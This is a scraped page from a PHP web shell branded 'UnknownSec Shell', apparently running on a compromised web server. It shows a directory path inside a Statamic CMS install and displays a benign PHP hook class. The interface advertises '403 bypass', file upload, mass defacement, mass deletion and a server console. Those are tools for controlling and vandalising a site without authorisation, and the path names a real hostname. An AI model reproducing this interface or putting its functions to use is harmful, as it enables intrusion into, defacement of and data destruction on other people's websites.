shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Hooks
/
CP
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
EntriesIndexQuery.php
<?php namespace Statamic\Hooks\CP; use Statamic\Support\Traits\Hookable; class EntriesIndexQuery { use Hookable; public function __construct(private $query, private $collection) { // } public function paginate(?int $perPage) { $payload = $this->runHooksWith('query', [ 'query' => $this->query, 'collection' => $this->collection, ]); return $payload->query->paginate($perPage); } }
© 2026 UnknownSec